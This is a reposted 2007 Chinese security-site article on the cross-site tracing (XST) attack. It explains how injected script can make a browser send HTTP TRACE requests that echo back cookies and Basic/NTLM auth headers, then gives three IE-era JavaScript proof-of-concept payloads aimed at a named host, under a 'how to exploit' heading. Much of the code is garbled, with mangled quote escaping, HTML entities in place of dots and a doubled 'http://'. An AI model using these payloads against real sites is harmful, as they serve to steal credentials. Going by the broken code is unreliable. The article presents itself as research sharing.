| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
cross-site tracing XST攻击
cross-site tracing XST攻击
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 11:12:26
注意:文章已经发表于8期黑客防线,版权归其所

XST攻击描述:
攻击者将恶意代码嵌入一台已经被控制的主机上的web文件,当访问者浏览时恶意代码在浏览器中执行,然后访问者的cookie、http基本验证以及ntlm验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致cookie欺骗或者是中间人攻击。

XST攻击条件:
1、需要目标web服务器允许Trace参数;
2、需要一个用来插入XST代码的地方;
3、目标站点存在跨域漏洞。

XST与XSS的比较:
相同点:都具有很大的欺骗性,可以对受害主机产生危害,而且这种攻击是多平台多技术的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。
优点:可以绕过一般的http验证以及NTLM验证

如何利用:

手法1:
<SCRIPT type=text/java script>
<!--
function xssTRACE(){
var xmlHttp=new ActiveXObject(/"Microsoft&#46;XMLHTTP/");
xmlHttp&#46;open(/"TRACE/",/"[url]http://wmjie&#46;51&#46;net/swords/[/url]/",false);
xmlHttp&#46;send();
xmlDoc=xmlHttp&#46;responseText;
alert(xmlDoc);
}

//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=/"XSS TRACE/">
手法2:
<SCRIPT type=text/java script>
<!--
function xssTRACE() {
var openWin=open(/"blank&#46;htm/",/"swords/",/"width=500,height=400/");
var otraceswords=openWin&#46;external;
openWin&#46;location&#46;href=/"[url]http://wmjie&#46;51&#46;net/swords/[/url]/";
setTimeout(
function () {
//以下必须写在一行
otraceswords&#46;NavigateAndFind('java script:xmlHttp=new ActiveXObject(/"Microsoft&#46;XMLHTTP/");xmlHttp&#46;open(/"TRACE/",/"[url]http://wmjie&#46;51&#46;net/swords/[/url]/",false);xmlHttp&#46;send();xmlDoc=xmlHttp&#46;responseText;alert(/"不用document&#46;cookie 显示站点wmjie&#46;51&#46;net/swords/ 的头信息。//n/" + xmlDoc);',/"/",/"/");
},
1024
);
}
//-->
</SCRIPT>
<BR><INPUT onclick=xssTRACE(); type=button value=/"XSS TRACE/">

手法3:
<SCRIPT type=text/java script>
function xssTRACE(){
var swords = /"var xmlHttp = new ActiveXObject(//"Microsoft.XMLHTTP//")/;xmlHttp.open(//"TRACE//",//"[url]http://http://www.tingh.com/[/url]//",false)/;xmlHttp.send()/;xmlDoc=xmlHttp.responseText/;alert(xmlDoc)/;/";
var target = /"[url]http://wmjie.51.net/swords/[/url]/";
spinach = encodeURIComponent(swords + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent(/"' + spinach + '/")))';
showModalDialog(target, null, readyCode);
}
</SCRIPT>
<BR><INPUT onclick=xssTRACE() type=button value=/"XSS TRACE/">
attachments/200507/28_165803_1.jpg


后记:研究阶段,希望能抛砖引玉,期望和您能够交流心得体会。
Once you have some questions,you can contract me. http://angler.126.com 【转自世纪安全网 http://www.21safe.com】
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    IronWebMail目录遍历信息
    Ingo Procmail驱动Shell
    Microsoft Word邮件合并
    Microsoft索引服务查询验
    PostgreSQL多字节字符编
    Symantec On-Demand Pro
    Microsoft管理控制台重新
    FrontPage最新漏洞 可能
    亦真亦假的Svchost.exe
    Windows系统专用木马、间

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览